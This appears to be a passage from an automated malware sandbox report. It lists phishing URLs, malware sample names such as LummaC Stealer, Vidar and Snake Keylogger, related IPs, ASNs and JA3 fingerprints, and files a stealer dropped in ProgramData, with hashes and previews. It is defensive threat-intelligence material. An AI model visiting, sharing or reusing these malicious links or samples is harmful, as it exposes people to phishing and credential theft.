	http://cache.netflix.com.id1.wuush.us.kg/	Get hash	malicious	Unknown	Browse	telegram.org/dl?tme=fe3233c08ff79d4814_5062105595184761217
	http://investors.spotify.com.sg2.wuush.us.kg/	Get hash	malicious	Unknown	Browse	telegram.org/
	http://bekaaviator.kz/	Get hash	malicious	Unknown	Browse	telegram.org/
	http://telegramtw1.org/	Get hash	malicious	Unknown	Browse	telegram.org/?setln=pl
	http://makkko.kz/	Get hash	malicious	Unknown	Browse	telegram.org/
	http://telegram.dog	Get hash	malicious	Unknown	Browse	telegram.dog/
	LnSNtO8JIa.exe	Get hash	malicious	Cinoshi Stealer	Browse	t.me/cinoshibot

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
t.me	https://sbg.kwo.mybluehost.me/united-airlines/	Get hash	malicious	Unknown	Browse	50.6.154.184
	WyPb2uVZ1P.exe	Get hash	malicious	LummaC Stealer	Browse	149.154.167.99
	http://voaqoczzyxj.work/	Get hash	malicious	Telegram Phisher	Browse	149.154.167.99
	Setup.exe	Get hash	malicious	LummaC Stealer	Browse	149.154.167.99
	https://telegramcom.kv252.top/	Get hash	malicious	Telegram Phisher	Browse	149.154.167.99
	keynote.exe	Get hash	malicious	LummaC Stealer	Browse	149.154.167.99
	updater.exe	Get hash	malicious	Vidar	Browse	149.154.167.99
	lnst#U0430Il#U0435r86x.exe	Get hash	malicious	LummaC Stealer	Browse	149.154.167.99
	Setup.exe	Get hash	malicious	Vidar	Browse	149.154.167.99
play.google.com	http://www.antham.com/	Get hash	malicious	Unknown	Browse	142.250.181.238
	https://docs.google.com/presentation/d/e/2PACX-1vR9fDeGf5MUCkInjRJmTQP_A7A1KiesFeAK7tBzfJ0WswmG-_qOqxWXat0f6mojkSTW_rQDaj-I4ALz/pub?start=false&loop=false&delayms=3000	Get hash	malicious	Unknown	Browse	142.250.186.78
	https://sites.google.com/view/primerica-company/home	Get hash	malicious	Unknown	Browse	142.250.186.78
	https://docs.google.com/presentation/d/e/2PACX-1vRRvWKWO_NaaKl4EhF01H_whQST10fp7Q0VUGzOgS_TF3NkYgjRysFJBvSu4s7PnWAGg2HaymZq30EK/pub?start=false&loop=false&delayms=3000&pli=1&slide=id.p	Get hash	malicious	Unknown	Browse	216.58.206.78
	https://ingecoperu.com/1fseaw89/check.php	Get hash	malicious	Unknown	Browse	142.250.185.142
	raro	Get hash	malicious	Unknown	Browse	216.58.206.78
	http://liefrung.neu.planen.3-64-214-85.cprapid.com/app/	Get hash	malicious	Unknown	Browse	142.250.186.110
	DocuFlex.exe	Get hash	malicious	Unknown	Browse	142.250.185.238
	https://drive.google.com/file/d/1D5-KYFqfC0fkqDI5TZQZfexXtk53o0CJ/view?usp=sharing_eip&ts=67b4fad7	Get hash	malicious	ScreenConnect Tool	Browse	216.58.206.78
	https://www.asbestos-testing-uk.com/my-account-2	Get hash	malicious	Unknown	Browse	172.217.18.14

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
TELEGRAMRU	Bibliofils.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	149.154.167.220
	Researches.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	149.154.167.220
	gq8sce-clean.com.com.exe	Get hash	malicious	AgentTesla, Discord Token Stealer	Browse	149.154.167.220
	Customer Request.exe	Get hash	malicious	Snake Keylogger	Browse	149.154.167.220
	PaymentAdvice18678.00.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	rSlutelementer.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	149.154.167.220
	Bank Transfer Form.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	000027_A-000032.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	149.154.167.220
	T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Get hash	malicious	MassLogger RAT, Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe	Get hash	malicious	Snake Keylogger	Browse	149.154.167.220
HETZNER-ASDE	jade.sh4.elf	Get hash	malicious	Mirai	Browse	95.217.66.158
	jade.arm.elf	Get hash	malicious	Mirai	Browse	95.217.252.222
	mips.elf	Get hash	malicious	Mirai	Browse	95.217.66.139
	m68k.elf	Get hash	malicious	Mirai	Browse	95.217.66.189
	na.elf	Get hash	malicious	Prometei	Browse	88.198.246.242
	na.elf	Get hash	malicious	Prometei	Browse	88.198.246.242
	na.elf	Get hash	malicious	Prometei	Browse	88.198.246.242
	na.elf	Get hash	malicious	Prometei	Browse	88.198.246.242
	HDFC PAYMENT.bat	Get hash	malicious	Unknown	Browse	168.119.145.117
	na.elf	Get hash	malicious	Prometei	Browse	88.198.246.242

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
37f463bf4616ecd445d4a1937da06e19	Finerede.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	149.154.167.99 116.202.180.73
	Bibliofils.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	149.154.167.99 116.202.180.73
	factura solicitada..exe	Get hash	malicious	GuLoader	Browse	149.154.167.99 116.202.180.73
	Researches.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	149.154.167.99 116.202.180.73
	Vidneafhring.exe	Get hash	malicious	GuLoader	Browse	149.154.167.99 116.202.180.73
	Doc171836.js	Get hash	malicious	BruteRatel, Latrodectus	Browse	149.154.167.99 116.202.180.73
	DHL RPA GRBP Template.PDF.js	Get hash	malicious	Remcos	Browse	149.154.167.99 116.202.180.73
	rSlutelementer.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	149.154.167.99 116.202.180.73
	Payment Summary 2025 11 2.exe	Get hash	malicious	GuLoader	Browse	149.154.167.99 116.202.180.73
	Payment Summary 2025 11 2.exe	Get hash	malicious	GuLoader	Browse	149.154.167.99 116.202.180.73

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\ProgramData\va1vs\gvs0hv	SecuriteInfo.com.Win32.Malware-gen.26093.20806.exe	Get hash	malicious	Vidar	Browse
	N11R7lRasm.exe	Get hash	malicious	Vidar	Browse
	SecuriteInfo.com.Trojan.Inject5.16384.2170.8558.exe	Get hash	malicious	Vidar	Browse
	random.exe	Get hash	malicious	Vidar	Browse
	hX2c2UOBSX.exe	Get hash	malicious	Vidar	Browse
	dOuC8iH5As.exe	Get hash	malicious	Vidar	Browse
	SQ1NgqeTQy.exe	Get hash	malicious	LummaC, Amadey, AsyncRAT, KeyLogger, LummaC Stealer, Stealc, StormKitty	Browse
	1l1ohfybAf.exe	Get hash	malicious	Vidar	Browse
	random.exe	Get hash	malicious	Vidar	Browse
	2E02vIiMfd.exe	Get hash	malicious	LummaC, Amadey, AsyncRAT, LummaC Stealer, PureLog Stealer, Socks5Systemz, Vidar	Browse

Created / dropped Files

C:\ProgramData\va1vs\1djw4w

Download File

Process:	C:\Users\user\Desktop\1.exe
File Type:	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	4309
Entropy (8bit):	5.059776328378613
Encrypted:	false
SSDEEP:	96:22CBzmeQiHRAQgXx9QgXcOaBIpghKkQlwYBwkbsgo9:MmCZy7BhA
MD5:	3A9306662FE93D09B05B9AE44128BCF1
SHA1:	77A917FFE8FF0EAAD8F3D3B764836C810E4C9DF5
SHA-256:	1988183ECBC3C6987DA9CB598C78B52D7563D995FA94D1E91E0470392E765374
SHA-512:	DA1F2776E8D1E08076032365B0D463DC847A31C6C360181D9966488455E878C7738DEC6F2B39153B2A410E3BEB73A05EB524593D125077273343740826A7B9F9
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	.<?xml version='1.0' encoding='utf-8' standalone='yes'?>..<assembly.. xmlns="urn:schemas-microsoft-com:asm.v3".. xmlns:xsd="http://www.w3.org/2001/XMLSchema".. xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance".. manifestVersion="1.0".. >.. <assemblyIdentity.. language="neutral".. name="Microsoft-Windows-dpapi-keys".. processorArchitecture="".. version="0.0.0.0".. />.. <migration.. scope="Upgrade,MigWiz,USMT,Data".. settingsVersion="1".. replacementSettingsVersionRange="0" .. >.. <machineSpecific>.. <migXml xmlns="">.. <rules context="User">.. <include>.. <objectSet>.. <pattern type="File">%CSIDL_APPDATA%\Microsoft\Protect [CREDHIST]</pattern>.. <pattern type="File">%CSIDL_APPDATA%\Microsoft\Protect\ [Preferred]</pattern>.. </objectSet>.. </include>.. <merge script="MigXmlHelper.DestinationPriority()">.. <objectSet>..

C:\ProgramData\va1vs\2v3wba

Download File

Process:	C:\Users\user\Desktop\1.exe
File Type:	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	4533
Entropy (8bit):	5.1021772201912805
Encrypted:	false
SSDEEP:	96:22X8PvMu0jPvJPM0UJl1/Qi9XexcElVOaBIpgmQlwYBwkbsgobVu:MUnZUb1xXMV37BhgVu
MD5:	477F010FDB6BD5E5E57D6DEC5449F2FB
SHA1:	73F9C03AF35B29EC2404BB70FEDC8C9ADADE74F6
SHA-256:	2DBEDD5D4D6645E9ED45563FDB1DC42387EF24C9CF5D6A08EC3BE448073C4696
SHA-512:	3C630BE96FC7FCD0036D254BA4D197AB31F37F6DAC411F8C78E624B0501D0205AF36CD5A29EC98D96D5D8D88EF2DBB2DF3A62C6F658A93302ECA500B8EC74F2F
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	.<?xml version='1.0' encoding='utf-8' standalone='yes'?>..<assembly.. xmlns="urn:schemas-microsoft-com:asm.v3".. xmlns:xsd="http://www.w3.org/2001/XMLSchema".. xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance".. authors="jeffspel".. buildFilter="".. company="Microsoft".. copyright="".. creationTimeStamp="2005-09-13T14:05:43.4054402-07:00".. lastUpdateTimeStamp="2005-09-13T15:41:02.9208750-08:00".. manifestVersion="1.0".. owners="jeffspel".. supportInformation="".. testers="".. >.. <assemblyIdentity.. buildFilter="".. buildType="release".. language="neutral".. name="Microsoft-Windows-dpapi-keys-DL".. processorArchitecture="*".. publicKeyToken="".. type="".. version="0.0.0.0".. versionScope="nonSxS".. />.. <migration.. xmlns="".. scope="Upgrade,MigWiz,USMT".. >.. <machineSpecific>.. <migXml>.. Check as this is only valid for down-level OS < than Windows V

C:\ProgramData\va1vs\5x47q9

Download File

Process:	C:\Users\user\Desktop\1.exe
File Type:	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	3019
Entropy (8bit):	4.884926762491409
Encrypted:	false
SSDEEP:	48:22e8z2j+YgfH0LeIg6aFnJmINGbYgaFnQ7sPvh27+QgL7sYN2b4waFnw+:22X2qD0SPJv1/Pvh2S/pVN
MD5:	63F04FB9936532B21E616E88E3EBED14
SHA1:	56CEC96A0D4B10C6FC28C726B76BEF278CBC512F
SHA-256:	61C5B3D0FD4051236AD00A0A39BE2F75F7E0DEC2AFBFF85617AED19AEF3FC650
SHA-512:	66FF4756CE723378126DC6C1EC493B665D08387B3305A97ED9A80500CCCE6001DFB7F8957E8246C7C572D0362DA49EEC7AF8451B849F9E0E89FD8E14041CE75D
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	.<?xml version='1.0' encoding='utf-8' standalone='yes'?>..<assembly.. xmlns="urn:schemas-microsoft-com:asm.v3".. xmlns:xsd="http://www.w3.org/2001/XMLSchema".. xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance".. manifestVersion="1.0".. >.. <assemblyIdentity.. buildType="$(build.buildType)".. language="neutral".. name="Microsoft-Windows-Extensible-Authentication-Protocol-Host-Service".. processorArchitecture="".. version="0.0.0.0".. versionScope="nonSxS".. />.. <migration.. replacementSettingsVersionRange="0".. replacementVersionRange="6.0-6.1.7150".. scope="Upgrade,MigWiz,USMT".. settingsVersion="0".. >.. <migXml xmlns="">.. <rules context="System">.. <include>.. <objectSet>.. <pattern type="Registry">HKLM\SYSTEM\CurrentControlSet\Services\EapHost\Methods\ [*]</pattern>.. <pattern type="Registry">HKLM\SYSTEM\CurrentControlSet\Services\EapHost\Configuration\

C:\ProgramData\va1vs\6fkfkx

Download File

Process:	C:\Users\user\Desktop\1.exe
File Type:	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	2062
Entropy (8bit):	4.925445222257812
Encrypted:	false
SSDEEP:	48:227+9gUKl+lxFcCY4/YBu4yTy3opyLyXyoyOyzylpjyA:22Sw+lxaWm3uCL9Gv
MD5:	60145F68B1CF9440FA663820AE11CE4B
SHA1:	10195A2926015E3024D769673E004AA60DFEC0A3
SHA-256:	4805E01EB0C9B3DFEB6B754D4148588E2FB798734D9EDE20E53EB8E75158B64F
SHA-512:	55D088040D25D4CBFF5A4210A85107666E628C67CA3134B0C836E135DBFE82AA4FA70185993E99D951307F7D159C1428B390727DA17EFEC5AA4BE9D799B96895
Malicious:	false
Preview:	.<?xml version='1.0' encoding='utf-8' standalone='yes'?>..<assembly.. xmlns="urn:schemas-microsoft-com:asm.v3".. manifestVersion="1.0".. >.. <assemblyIdentity.. language="".. name="Microsoft-Windows-Kerberos-Key-Distribution-Center-DL".. processorArchitecture="".. publicKeyToken="$(Build.WindowsPublicKeyToken)".. version="0.0.0.0".. />.. <migration>.. <machineSpecific>.. <migXml xmlns="">.. Check as this is only valid for down-level OS < than Windows Vista ? -->.. <detects>.. <detect>.. <condition>MigXmlHelper.IsOSEarlierThan("NT", "6.0.0.0")</condition>.. </detect>.. </detects>.. <rules context="System">.. <include>.. <objectSet>.. <pattern type="Registry">HKLM\SYSTEM\CurrentControlSet\Services\kdc\* [*]</pattern>.. </objectSet>.. </include>.. <exclude>.. <objectSet>.. <pattern type="Reg

C:\ProgramData\va1vs\7ymgl6

Download File

Process:	C:\Users\user\Desktop\1.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	114688
Entropy (8bit):	0.9746603542602881
Encrypted:	false
SSDEEP:	192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
MD5:	780853CDDEAEE8DE70F28A4B255A600B
SHA1:	AD7A5DA33F7AD12946153C497E990720B09005ED
SHA-256:	1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
SHA-512:	E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
Malicious:	false
Preview:	SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\va1vs\8gvk6x

Download File

Process:	C:\Users\user\Desktop\1.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	2829
Entropy (8bit):	5.130068712095974
Encrypted:	false
SSDEEP:	48:/2e8G+F0Vg8DIIgPdunPduPPduNJ7IgfCfikfidjikjirJu/MY4C5uXC5u/C5upL:/29F+cO0Mf7Rwiai5ieiFEMAQSQaQwX4
MD5:	CD55A48FE382A6820EC4FB55A66C2858
SHA1:	70A0A7B0E12DF915BD5E68FF0432637EFC2153DE
SHA-256:	97838AB994B53DFADEEF63955EECB05A7F118C2066EF97B0B0EB7BB48A526451
SHA-512:	37C6D78CCD807B04834659B5E796424C443B2C4F72481CB4080ED1BC5E6A954E47C4AF837A653DDAAFED2372C4FF60CE442170EA58586AB93C57B841449C5195
Malicious:	false
Preview:	<?xml version='1.0' encoding='utf-8' standalone='yes'?>..<assembly.. xmlns="urn:schemas-microsoft-com:asm.v3".. xmlns:xsd="http://www.w3.org/2001/XMLSchema".. xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance".. manifestVersion="1.0".. >.. <assemblyIdentity.. name="Microsoft-Windows-Crypto-keys".. version="0.0.0.0".. processorArchitecture="".. language="neutral".. />.. <migration scope="Upgrade,MigWiz,USMT" .. replacementVersionRange="6.0-6.1".. replacementSettingsVersionRange="0".. settingsVersion="0" .. >.. <migXml xmlns="">.. <rules context="User">.. <include>.. <objectSet>.. <pattern type="File">%CSIDL_APPDATA%\Microsoft\Crypto\RSA\[]</pattern>.. <pattern type="File">%CSIDL_APPDATA%\Microsoft\Crypto\DSS\[]</pattern>.. <pattern type="File">%CSIDL_APPDATA%\Microsoft\Crypto\Keys[]</pattern>.. </objectSet>.. </include>.. </rules>..

C:\ProgramData\va1vs\9hl6p8

Download File

Process:	C:\Users\user\Desktop\1.exe
File Type:	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	1095
Entropy (8bit):	4.976174799333973
Encrypted:	false
SSDEEP:	24:p/o2e8ZR+UX6g0cj3+3A63sDEF4wwVpQwuoMBX0FCUK:22e8v+DgfLUwY4fcZB2A
MD5:	ECC51190BD585AB376691BBDDF2A638B
SHA1:	84DE01CF25B71C0BC4D16FAF65BE1589E385EAF0
SHA-256:	6F15C7E90A3C414BEAD4C1C50DC5E7CAB987D72E2F49953B717A879D7745038C
SHA-512:	C0626F92BD934A3C5295EA32D63910C3F51E0A47CB6287C698C0DF7EE66C1D1A1867FDE10F824BD7514566C69CD2DA16571D3F0DC56FE9DE39D13F89DFE2A02A
Malicious:	false
Preview:	.<?xml version='1.0' encoding='utf-8' standalone='yes'?>..<assembly.. xmlns="urn:schemas-microsoft-com:asm.v3".. xmlns:xsd="http://www.w3.org/2001/XMLSchema".. xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance".. manifestVersion="1.0".. >.. <assemblyIdentity.. language="neutral".. name="Microsoft-Windows-Embedded-KeyboardFilterService-Client".. processorArchitecture="".. version="0.0.0.0".. versionScope="nonSxS".. />.. <migration.. replacementSettingsVersionRange="0-1".. settingsVersion="2".. >.. <machineSpecific>.. <migXml xmlns="">.. Per-machine state -->.. <rules context="System">.. <include>.. <objectSet>.. <pattern type="Registry">HKLM\SOFTWARE\Microsoft\Windows Embedded\KeyboardFilter\ [*]</pattern>.. <pattern type="Registry">HKLM\SYSTEM\CurrentControlSet\Services\MsKeyboardFilter [Start]</pattern>.. </objectSet>.. </inc

C:\ProgramData\va1vs\aiw4ek

Download File

Process:	C:\Users\user\Desktop\1.exe
File Type:	SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	98304
Entropy (8bit):	0.08235737944063153
Encrypted:	false
SSDEEP:	12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
MD5:	369B6DD66F1CAD49D0952C40FEB9AD41
SHA1:	D05B2DE29433FB113EC4C558FF33087ED7481DD4
SHA-256:	14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
SHA-512:	771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\va1vs\gdtjm7

Download File

Process:	C:\Users\user\Desktop\1.exe
File Type:	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	1065
Entropy (8bit):	4.96984082363901
Encrypted:	false
SSDEEP:	24:p/o2e8ZF2YS+pg0cjh3N1LRMEF4wuSb3wuyBX0FCUK:22e8z2j+pgfZlMY4Qr0B2A
MD5:	4DBFCA3B87A59186D2612A95CA2CD899
SHA1:	4C84BD2D60CE789B44070CDDC296C09D2F52B1CC
SHA-256:	2C229D8DA31E17FCEF244A8A2029CA8FE8374738A9ECBFED9E23FB89DB8DF059
SHA-512:	704ECDBE3FC38AC3807946072C7C523C36B4AF1586BEFE01A87BBBF35CF20214A0E0DE892A56E74FE8AA806154D7D2B9CC7028AEF47BEC326564B5F18CD12421
Malicious:	false
Preview:	.<?xml version='1.0' encoding='utf-8' standalone='yes'?>..<assembly.. xmlns="urn:schemas-microsoft-com:asm.v3".. xmlns:xsd="http://www.w3.org/2001/XMLSchema".. xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance".. manifestVersion="1.0".. >.. <assemblyIdentity.. buildType="$(build.buildType)".. language="neutral".. name="Microsoft-OneCore-TetheringService".. processorArchitecture="".. version="0.0.0.0".. />.. <migration.. replacementSettingsVersionRange="0".. settingsVersion="1".. alwaysProcess="Yes".. >.. <machineSpecific>.. <migXml xmlns="">.. <rules context="System">.. <include>.. <objectSet>.. <pattern type="Registry">HKLM\SYSTEM\CurrentControlSet\Services\icssvc\Roaming\[]</pattern>.. <pattern type="Registry">HKLM\SYSTEM\CurrentControlSet\Services\icssvc\Settings\[*]</pattern>.. </objectSet>.. </include>.. </rules>..

C:\ProgramData\va1vs\gvs0hv

Download File

Process:	C:\Users\user\Desktop\1.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	24008
Entropy (8bit):	6.062446965815151
Encrypted:	false
SSDEEP:	192:GKODczWz9IdqYbN9h+rKipXKuS28xb3HWJvah46Flkzl2W4FWEWSawTyihVWQ4e1:6DiWzGG+mKlxb32JyczEW4FWdwGyUlI
MD5:	6AEAEBF650EFC93CD3B6670A05724FE8
SHA1:	A4FE07E6C678AC8D4DC095997DB5043668D103B4
SHA-256:	C86891B9DF9FEEA2E98F50C9950CB446DB97A513AF0C23810F7CA818A6187329
SHA-512:	5C7E8C7DBAEB22956C774199BAD83312987240D574160B846349C0E237445407FF1CAACD2984BFAD0BBBE6011CC8918AF60A0EBBE82A8561CAFA4DF825ADD183
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: SecuriteInfo.com.Win32.Malware-gen.26093.20806.exe, Detection: malicious, Browse Filename: N11R7lRasm.exe, Detection: malicious, Browse Filename: SecuriteInfo.com.Trojan.Inject5.16384.2170.8558.exe, Detection: malicious, Browse Filename: random.exe, Detection: malicious, Browse Filename: hX2c2UOBSX.exe, Detection: malicious, Browse Filename: dOuC8iH5As.exe, Detection: malicious, Browse Filename: SQ1NgqeTQy.exe, Detection: malicious, Browse Filename: 1l1ohfybAf.exe, Detection: malicious, Browse Filename: random.exe, Detection: malicious, Browse Filename: 2E02vIiMfd.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........Q..Q..Q..E...S..E...]..Q..t..E...Z..E...P..E...S..E.S.P..E...P..RichQ..................PE..d....Q.!..........",.........$......................................................Bn....`A.........................................<..X....<..x....p..(....`..h....<...!......(....8..T............................0..............(1..0............................text...p........................... ..`.rdata..>....0......................@..@.data...`....P.......0..............@....pdata..h....`.......2..............@..@.rsrc...(....p.......4..............@..@.reloc..(............:..............@..B........................................................................................................................................................................................................................................................................

C:\ProgramData\va1vs\kfcjwb

Download File

Process:	C:\Users\user\Desktop\1.exe
File Type:	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	2947
Entropy (8bit):	5.120077314818075
Encrypted:	false
SSDEEP:	48:22e8T8PvMu0846PYPvJ8+F9gUUL0VlxfMUIgPdunPduZJ0gPdunPduZQ/+lx3cCQ:22X8PvMu0LtPvJPF+0VlVO0z60w+lfah
MD5:	C7E301D9DD77A21C1CDBD73A63AF205C
SHA1:	715D25AA0C06B2AD162F52A8DE06FB5040C389B1
SHA-256:	239C9A49ACDA9FC9845B87819A33D07F359803153FEFFE4D2212989F82DE71E1
SHA-512:	B0E6FFB10EF5EB9EB433A23803591C84F603779306E78B1648374218A50D2F77E8EE7215615E9D1BE033A96B735321FCA9D5F7B0CB65661674346FC1546E43FE
Malicious:	false
Preview:	.<?xml version='1.0' encoding='utf-8' standalone='yes'?>..<assembly.. xmlns="urn:schemas-microsoft-com:asm.v3".. xmlns:xsd="http://www.w3.org/2001/XMLSchema".. xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance".. authors="jeffspel".. buildFilter="".. company="Microsoft".. copyright="".. creationTimeStamp="2005-09-13T14:04:43.4054402-07:00".. lastUpdateTimeStamp="2005-09-13T15:39:02.9208750-08:00".. manifestVersion="1.0".. owners="jeffspel".. supportInformation="".. testers="".. >.. <assemblyIdentity.. buildFilter="".. buildType="release".. language="neutral".. name="Microsoft-Windows-Crypto-keys-DL".. processorArchitecture="*".. publicKeyToken="$(Build.WindowsPublicKeyToken)".. type="".. version="0.0.0.0".. versionScope="nonSxS".. />.. <migration.. xmlns="".. scope="Upgrade,MigWiz,USMT".. >.. <migXml xmlns="">.. Check as this is only valid for down-level OS < t

C:\ProgramData\va1vs\kx4opz

Download File

Process:	C:\Users\user\Desktop\1.exe
File Type:	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	1941
Entropy (8bit):	4.861537145678193
Encrypted:	false
SSDEEP:	48:22e8v+phDgrcHreIg/0xJ9U3C0gcj0kqIg/0xJuX:22CphPHyx0ruS0N0kqx0rQ
MD5:	6F0056EC818D4FC20158F3FF190D6D6A
SHA1:	9E2108FE560CC2187395C5EED011559D201CE45D
SHA-256:	2F9596801DBE57D73C292BE4F93BD0C05F6D0A44C7A45F5F03FDBE35993B7DEC
SHA-512:	72C193919EC4402D430CCBCC4F9A9B25DC9AAECBCCAEE666EFE20DA4133964D2382F1090EEB8FB0A3073ACAA7825AF7A62B59447D29F912A19BD4C04CDDF1AD1
Malicious:	false
Preview:	.<?xml version='1.0' encoding='utf-8' standalone='yes'?>..<assembly.. xmlns="urn:schemas-microsoft-com:asm.v3".. xmlns:xsd="http://www.w3.org/2001/XMLSchema".. xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance".. manifestVersion="1.0".. >.. <assemblyIdentity.. language="neutral".. name="Microsoft-CertificateAuthority-Enrollment-ServerUpgrade".. processorArchitecture="".. version="1.0.0.0".. versionScope="nonSxS".. />.. <migration.. alwaysProcess="yes".. replacementSettingsVersionRange="0".. replacementVersionRange="6.1.".. settingsVersion="0".. >.. <migXml xmlns="">.. <rules context="System">.. <include>.. <objectSet>.. <pattern type="Registry">HKLM\Software\Microsoft\ADCS\CES [ConfigurationStatus]</pattern>.. </objectSet>.. </include>.. </rules>.. <rules context="System">.. <detects>.. <detect>.. Detection of CES. -

C:\ProgramData\va1vs\m7yuk6

Download File

Process:	C:\Users\user\Desktop\1.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 32768, file counter 2, database pages 9, cookie 0x6, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	294912
Entropy (8bit):	0.08436842005578409
Encrypted:	false
SSDEEP:	192:5va0zkVmvQhyn+Zoz679fqlQbGhMHPaVAL23vIn:51zkVmvQhyn+Zoz67n
MD5:	2CD2840E30F477F23438B7C9D031FC08
SHA1:	03D5410A814B298B068D62ACDF493B2A49370518
SHA-256:	49F56AAA16086F2A9DB340CC9A6E8139E076765C1BFED18B1725CC3B395DC28D
SHA-512:	DCDD722C3A8AD79265616ADDDCA208E068E4ECEBE8820E4ED16B1D1E07FD52EB3A59A22988450071CFDA50BBFF7CB005ADF05A843DA38421F28572F3433C0F19
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j......z<.{...{.{a{.z.z<z.............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\va1vs\ohd2nglfk

Download File

Process:	C:\Users\user\Desktop\1.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8553638852307782
Encrypted:	false
SSDEEP:	48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:	28222628A3465C5F0D4B28F70F97F482
SHA1:	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:	C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\va1vs\ph47qiwbs

Download File

Process:	C:\Users\user\Desktop\1.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	49152
Entropy (8bit):	0.8180424350137764
Encrypted:	false
SSDEEP:	96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
MD5:	349E6EB110E34A08924D92F6B334801D
